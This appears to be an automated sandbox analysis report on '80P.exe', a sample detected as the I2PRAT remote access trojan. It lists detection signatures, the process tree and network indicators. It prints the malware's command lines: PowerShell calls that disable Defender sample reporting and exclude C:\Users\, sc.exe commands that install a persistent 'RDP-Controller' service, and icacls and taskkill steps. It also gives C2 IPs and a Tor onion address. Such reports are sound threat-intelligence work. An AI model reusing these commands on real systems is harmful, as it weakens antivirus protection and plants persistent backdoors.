Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
80P.exe

Overview

General Information

Sample name:80P.exe
Analysis ID:1589221
MD5:f0cfd22855ee0cf1935a36ea32f15138
SHA1:8d971dc8a0f41f2e2c9dbd80f4b0cd5e1f164a96
SHA256:acc39a1fdfcecae66662397c3d8e49d29efaebd8739f1603870a01dd3a603db7
Tags:exeI2Parcaeuser-aachum
Infos:

Detection

I2PRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected I2PRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Performs DNS queries to domains with low reputation
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
Uses TOR for connection hidding
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • 80P.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\80P.exe" MD5: F0CFD22855EE0CF1935A36EA32F15138)
  • 80P.exe (PID: 6984 cmdline: C:\Users\user\Desktop\80P.exe MD5: F0CFD22855EE0CF1935A36EA32F15138)
    • cmd.exe (PID: 6192 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3696 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6616 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1516 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • jvnu3e85o6ls9huft0apy3731vg.exe (PID: 5840 cmdline: "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)
      • taskkill.exe (PID: 2496 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6616 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2536 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6332 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6292 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 3428 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 2032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 2568 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • main.exe (PID: 4124 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
    • WerFault.exe (PID: 2496 cmdline: C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 4956 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5812 cmdline: C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • main.exe (PID: 7008 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.logJoeSecurity_I2PRATYara detected I2PRATJoe Security
    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.werJoeSecurity_I2PRATYara detected I2PRATJoe Security
      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmpJoeSecurity_I2PRATYara detected I2PRATJoe Security
        C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkgJoeSecurity_I2PRATYara detected I2PRATJoe Security
          SourceRuleDescriptionAuthorStrings
          0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_I2PRATYara detected I2PRATJoe Security
            00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_I2PRATYara detected I2PRATJoe Security
              Process Memory Space: jvnu3e85o6ls9huft0apy3731vg.exe PID: 5840JoeSecurity_I2PRATYara detected I2PRATJoe Security
                Process Memory Space: main.exe PID: 4124JoeSecurity_I2PRATYara detected I2PRATJoe Security
                  Process Memory Space: main.exe PID: 7008JoeSecurity_I2PRATYara detected I2PRATJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5812, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 4124, ProcessName: main.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 3696, ProcessName: powershell.exe
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe, ParentProcessId: 5840, ParentProcessName: jvnu3e85o6ls9huft0apy3731vg.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 2536, ProcessName: sc.exe
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 185.226.181.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 4124, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 1516, ProcessName: powershell.exe
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe, ParentProcessId: 5840, ParentProcessName: jvnu3e85o6ls9huft0apy3731vg.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 2536, ProcessName: sc.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6192, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 3696, ProcessName: powershell.exe
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 4956, ProcessName: svchost.exe
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://netdb.i2p2.no/Avira URL Cloud: Label: malware
                    Source: https://reseed.i2pgit.org/Avira URL Cloud: Label: malware
                    Source: https://reseed2.i2p.net/hOAvira URL Cloud: Label: malware
                    Source: https://reseed.i2pgit.org//p_lib.cAvira URL Cloud: Label: malware
                    Source: https://reseed.i2pgit.org/AAvira URL Cloud: Label: malware
                    Source: https://reseed.diva.exchange/Avira URL Cloud: Label: malware
                    Source: https://reseed2.i2p.net/Avira URL Cloud: Label: malware
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllReversingLabs: Detection: 26%
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllReversingLabs: Detection: 31%
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeReversingLabs: Detection: 69%
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeReversingLabs: Detection: 69%
                    Source: C:\Windows\Temp\I2HoxnamReversingLabs: Detection: 50%
                    Source: C:\Windows\Temp\ia0qD2w9ReversingLabs: Detection: 31%
                    Source: C:\Windows\Temp\wwgq2y6SReversingLabs: Detection: 26%
                    Source: 80P.exeVirustotal: Detection: 8%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeJoe Sandbox ML: detected

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\80P.exeUnpacked PE file: 0.2.80P.exe.3440000.1.unpack
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
                    Source: Binary string: RfxVmt.pdb source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.20.dr
                    Source: Binary string: RfxVmt.pdbGCTL source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.20.dr
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E16387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,20_2_00007FFE0E16387F
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E1638C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,20_2_00007FFE0E1638C3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116B387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,31_2_00007FFE116B387F
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116B38C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,31_2_00007FFE116B38C3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD61CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FF6BFD61CF3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E166233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE0E166233
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EB4B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE0EB4B333
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EBD4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE0EBD4013
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EC05013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE0EC05013
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE115057B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE115057B3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE133031F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,20_2_00007FFE133031F3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116B6233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE116B6233
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116EB333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE116EB333
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE11714013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE11714013
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE11745013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE11745013
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE117757B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,31_2_00007FFE117757B3
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]20_2_00007FF6BFD6737B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]20_2_00007FFE0E16A13B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]20_2_00007FFE0EB47DFB
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]20_2_00007FFE0EBD967B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]20_2_00007FFE0EC0A67B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]20_2_00007FFE1150293B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]20_2_00007FFE13309BBB
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]31_2_00007FFE116BA13B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]31_2_00007FFE116E7DFB
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]31_2_00007FFE1171967B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]31_2_00007FFE1174A67B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]31_2_00007FFE1177293B

                    Networking

                    barindex
                    Source: global trafficTCP traffic: 173.209.166.184 ports 0,1,57108,5,7,8
                    Source: global trafficTCP traffic: 174.119.206.85 ports 1,2,3,32791,7,9
                    Source: global trafficTCP traffic: 95.158.36.98 ports 0,1,2,30125,3,5
                    Source: global trafficTCP traffic: 134.16.78.198 ports 29107,0,1,2,7,9
                    Source: global trafficTCP traffic: 46.139.242.51 ports 0,1,2,4,6,14602
                    Source: global trafficTCP traffic: 95.31.23.9 ports 0,1,3,7,9,17903
                    Source: global trafficTCP traffic: 175.215.255.118 ports 1,31497,3,4,7,9
                    Source: global trafficTCP traffic: 89.223.52.84 ports 0,2,27690,6,7,9
                    Source: global trafficTCP traffic: 46.138.247.227 ports 45301,0,1,3,4,5
                    Source: global trafficTCP traffic: 79.119.11.221 ports 13529,1,2,3,5,9
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
                    Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
                    Source: main.exe, 00000014.00000003.1930544269.0000013B45687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000003.1930731654.0000013B452B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000003.1930622676.0000013B4567E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
                    Source: main.exe, 00000014.00000003.1930622676.0000013B45687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000003.1930980993.0000013B452B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000003.1930980993.0000013B452B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
                    Source: main.exe, 00000014.00000003.1930576739.0000013B452B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                    Source: main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
